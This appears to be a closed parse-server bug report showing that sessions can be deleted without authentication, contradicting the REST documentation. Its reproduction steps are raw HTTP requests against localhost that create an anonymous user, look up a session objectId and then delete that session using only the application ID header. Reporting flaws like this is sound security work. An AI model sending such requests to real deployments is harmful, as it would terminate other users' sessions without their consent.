Closed
Description
Issue Description
Looks like the documentation from here:
http://docs.parseplatform.org/rest/guide/#deleting-sessions
That says "You can only delete other sessions that belong to the same user." is false. If a session object id is leaked, it can be deleted with a request that only has the X-Parse-Application-Id header.
Steps to reproduce
- Create an anonymous user with a request like this:
POST /parse/users/ HTTP/1.1
Host: localhost:1337
Content-Type: application/json
X-Parse-Application-Id: myAppId
Cache-Control: no-cache
{
"authData": {
"anonymous": {
"id": "8ba115f2-db2f-4de9-a976-e3cfd18d8be1"
}
}
}
- Note the sessionToken in the response
- Look up the session objectId with a request like this:
GET /parse/sessions/me HTTP/1.1
Host: localhost:1337
X-Parse-Application-Id: myAppId
X-Parse-Session-Token: r:2e43f46b20a3c6420043d3299d7dcead
Content-Type: application/json
Cache-Control: no-cache
- Note the objectId
- Try to delete the session object with an unauthenticated request like this
DELETE /parse/sessions/VapNXYViLW HTTP/1.1
Host: localhost:1337
X-Parse-Application-Id: myAppId
Cache-Control: no-cache
Expected Results
You should have to prove you are a given user (with a session token) before you're allowed to delete sessions of that user.
Actual Outcome
The session is deleted
Environment Setup
- Server
- parse-server version: commit hash 9ad8697
- Operating System: Windows
- Localhost or remote server? localhost